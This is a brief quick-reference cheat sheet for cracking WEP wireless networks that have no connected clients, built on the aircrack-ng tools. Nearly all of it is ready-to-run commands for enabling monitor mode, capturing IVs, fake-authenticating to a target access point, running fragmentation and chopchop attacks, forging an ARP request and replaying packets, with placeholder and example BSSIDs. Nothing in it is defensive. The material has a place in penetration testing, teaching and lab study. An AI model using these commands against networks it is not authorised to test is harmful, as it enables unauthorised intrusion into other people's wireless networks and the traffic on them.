Clientless WEP

Table of Contents

  1. Setup
    1. Monitor Mode
    2. Packet Capture
    3. Fake Authentication
  2. Fragmentation
  3. Korek Chop Chop
  4. Packet Forge
  5. ARP replay
  6. Modified Packet Replay

This is intended to be a quick reference for more detailed information please refer to aircrack-ng documentation.

Setup

Monitor Mode 1

list available interfaces

sudo airmon-ng

pseudo

sudo airmon-ng start <interface> <channel>

example

sudo airmon-ng start wlan0 6

Packet Capture 2

pseudo

sudo airodump-ng --channel <channel_number> --bssid <AP_BSSID> -w <file> --ivs <interface>

example

sudo airodump-ng --channel 6 --bssid 00:AA:11:BB:22:CC -w test --ivs wlan0mon

Fake Authentication 3

pseudo

sudo aireplay-ng --fakeauth 20 -a <AP_BSSID> -h <source_BSSID> <interface>

example

sudo aireplay-ng --fakeauth 20 -a 00:AA:11:BB:22:CC -h 11:AA:22:BB:33:CC wlan0mon

Fragmentation 4

pseudo

sudo aireplay-ng --fragment -a <AP_BSSID> -h <source_BSSID> <interface>

example

sudo aireplay-ng --fragment -a 00:AA:11:BB:22:CC -h 11:AA:22:BB:33:CC wlan0mon

Korek Chop Chop 5

pseudo

sudo aireplay-ng --chopchop -b <AP_BSSID> -h <source_BSSID> <interface>

example

sudo aireplay-ng --chopchop -b 00:AA:11:BB:22:CC -h 11:AA:22:BB:33:CC wlan0mon

Packet Forge 6

psudo

packetforge-ng -0 -a <AP_BSSID> -h <source_BSSID> -k <AP_IPAddress> -l <source_IPAddress> -y <xor_file> -w <output_file>

example

packetforge-ng -0 -a 00:AA:11:BB:22:CC -h 11:AA:22:BB:33:CC -k 192.168.1.1 -l 192.168.1.2 -y replay_dec-1002-153255.xor -w arp-request

ARP replay 7

psudo

sudo aireplay-ng --interactive -r <packet_file> <interface>

example

sudo aireplay-ng --interactive -r arp-request wlan0mon

Modified Packet Replay 8

pseudo

sudo aireplay-ng --interactive -b <AP_BSSID> -t 1 -c FF:FF:FF:FF:FF:FF -p 0841 <interface>

example

sudo aireplay-ng --interactive -b 00:AA:11:BB:22:CC -t 1 -c FF:FF:FF:FF:FF:FF -p 0841 wlan0mon

Footnotes

1 https://www.aircrack-ng.org/doku.php?id=airmon-ng

2 https://www.aircrack-ng.org/doku.php?id=airodump-ng

3 https://www.aircrack-ng.org/doku.php?id=fake_authentication

4 https://www.aircrack-ng.org/doku.php?id=fragmentation

5 https://www.aircrack-ng.org/doku.php?id=korek_chopchop

6 https://www.aircrack-ng.org/doku.php?id=packetforge-ng

7 https://www.aircrack-ng.org/doku.php?id=arp-request_reinjection

8 https://www.aircrack-ng.org/doku.php?id=interactive_packet_replay

Read more